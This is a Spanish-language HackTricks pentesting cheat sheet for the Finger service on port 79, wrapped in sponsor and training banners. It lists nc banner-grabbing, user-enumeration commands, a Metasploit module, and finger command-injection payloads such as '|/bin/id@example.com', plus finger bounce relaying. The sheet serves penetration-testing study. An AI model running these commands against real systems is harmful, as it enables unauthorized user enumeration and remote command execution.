hacktricks/network-services-pentesting/pentesting-finger.md

5.3 KiB

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Configuración disponible instantáneamente para evaluación de vulnerabilidades y pruebas de penetración. Realiza un pentest completo desde cualquier lugar con más de 20 herramientas y características que van desde la recopilación de información hasta la elaboración de informes. No reemplazamos a los pentesters; desarrollamos herramientas personalizadas, módulos de detección y explotación para devolverles algo de tiempo para profundizar, obtener acceso y divertirse.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

Información Básica

El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. Típicamente, la información proporcionada incluye el nombre de inicio de sesión del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podrían incluir la ubicación de la oficina y el número de teléfono (si está disponible), la hora en que el usuario inició sesión, el período de inactividad (tiempo inactivo), la última vez que el usuario leyó el correo y el contenido de los archivos de plan y proyecto del usuario.

Puerto por defecto: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeración

Captura de Banner/Conexión básica

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeración de usuarios

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer usando scripts predeterminados

Metasploit utiliza más trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Ejecución de comandos

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Usar un sistema como un relé de finger

finger user@host@victim
finger @internal@external

Configuración disponible al instante para evaluación de vulnerabilidades y pruebas de penetración. Realiza un pentest completo desde cualquier lugar con más de 20 herramientas y características que van desde la recopilación hasta la elaboración de informes. No reemplazamos a los pentesters; desarrollamos herramientas personalizadas, módulos de detección y explotación para devolverles algo de tiempo para profundizar, abrir shells y divertirse.

{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

{% hint style="success" %} Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)

Apoya a HackTricks
{% endhint %}